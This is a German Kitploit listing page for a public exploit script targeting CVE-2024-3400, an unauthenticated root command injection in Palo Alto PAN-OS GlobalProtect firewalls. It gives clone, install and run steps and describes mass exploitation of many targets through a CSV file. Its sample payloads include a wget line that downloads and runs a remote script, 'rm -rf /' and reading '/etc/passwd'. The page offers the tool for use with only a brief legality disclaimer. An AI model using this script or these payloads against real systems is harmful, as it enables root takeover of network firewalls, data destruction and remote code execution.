Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-3400 — # Exploit-Skript für CVE-2024-3400, eine Command Injection in PAN-OS GlobalProtect, die eine nicht authentifizierte Remote-Codeausführung mit Root-Rechten ermöglicht. Unterstützt die Ausnutzung einzelner sowie CSV-basierter Mehrfachziele. | Kitploit
Tools/GitHubGitHub/yuvvi01/cve-2024-3400
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

# Exploit-Skript für CVE-2024-3400, eine Command Injection in PAN-OS GlobalProtect, die eine nicht authentifizierte Remote-Codeausführung mit Root-Rechten ermöglicht. Unterstützt die Ausnutzung einzelner sowie CSV-basierter Mehrfachziele.

Repository anzeigen
1151vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PAN-OS Firewall Exploit-Skript

Dieses Skript soll die Ausnutzung von Schwachstellen in PAN-OS-Firewalls demonstrieren. Es sendet einen speziell konstruierten Payload an den API-Endpunkt der Firewall, um beliebige Befehle auszuführen. Dieser Exploit richtet sich speziell gegen CVE-2024-3400, eine Befehlsinjektions-Schwachstelle in der GlobalProtect-Funktion der PAN-OS-Software von Palo Alto Networks für bestimmte PAN-OS-Versionen. Bestimmte Funktionskonfigurationen können es einem nicht authentifizierten Angreifer ermöglichen, beliebigen Code mit Root-Rechten auf der Firewall auszuführen.

Hinweis: Stellen Sie sicher, dass Sie dieses Skript nur für legale und ethische Zwecke verwenden, und nur auf Maschinen, für die Sie die Erlaubnis zum Testen haben.

Verwendung

Um dieses Projekt zu verwenden, führen Sie die folgenden Schritte aus:

  1. Klonen Sie dieses Repository:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. Wechseln Sie in das Repository-Verzeichnis:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. Installieren Sie die erforderlichen Module:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. Führen Sie das Python-Skript aus.
    root@kitploit:~
    python3 exploit.py
    

Folgen Sie den Aufforderungen zur Eingabe der IP-Adresse der angreifbaren PAN-OS-Firewall und des auszuführenden Payloads.

Beispiel-Payloads

  1. Verzeichnisinhalte auflisten:
    root@kitploit:~
    ls -la
    
    
  2. Inhalte einer bestimmten Datei anzeigen:
    root@kitploit:~
    cat /etc/passwd
    
    
  3. Benutzernamen des aktuell angemeldeten Benutzers ausgeben:
    root@kitploit:~
    whoami
    
    
  4. Eine Datei aus dem Internet herunterladen (erfordert installiertes wget oder curl):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  5. Seien Sie bei diesem Befehl sehr vorsichtig:
    root@kitploit:~
    rm -rf /
    

Anweisungen für die sichere Nutzung

SSL-Zertifikatsüberprüfung

Das Skript fragt nach dem Dateipfad des SSL-Zertifikats vom PAN-OS-Firewall-Server. Wenn kein Pfad angegeben wird, setzt das Skript die SSL-Überprüfung automatisch auf false, wodurch SSL effektiv deaktiviert wird.

CSV-Dateianweisungen

Dieses Skript ermöglicht es Ihnen, mehrere Ziele von angreifbaren PAN-OS-Firewalls mithilfe einer CSV-Datei auszunutzen. Nachfolgend finden Sie die Anweisungen zur korrekten Formatierung der CSV-Datei:

CSV-Dateiformat:

Die CSV-Datei sollte drei Spalten haben:

ipaddress: Die IP-Adresse der angreifbaren PAN-OS-Firewall. payload: Der auf der Firewall auszuführende Payload. path/to/root_CA_certificate.pem: Der Pfad zum Root-CA-Zertifikat (leer lassen, wenn die Zertifikatsüberprüfung deaktiviert ist).

  • Beispiel einer CSV-Datei:
    root@kitploit:~
    ipaddress,payload,path/to/root_CA_certificate.pem
    192.168.1.1,exploit_payload1,/path/to/certificate.pem
    192.168.1.2,exploit_payload2,
    

Anweisungen:

Erstellen Sie eine CSV-Datei mit dem angegebenen Format. Füllen Sie die IP-Adressen, Payloads und Pfade zu den Root-CA-Zertifikaten (falls zutreffend) aus. Stellen Sie sicher, dass Sie gültige Pfade zu den Root-CA-Zertifikaten angeben, oder lassen Sie das Feld leer, wenn die Zertifikatsüberprüfung deaktiviert ist. Führen Sie das Skript aus und wählen Sie die Option zur Verwendung der CSV-Datei, wenn Sie dazu aufgefordert werden.

Referenzen

  • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
  • https://security.paloaltonetworks.com/CVE-2024-3400
Tool herunterladen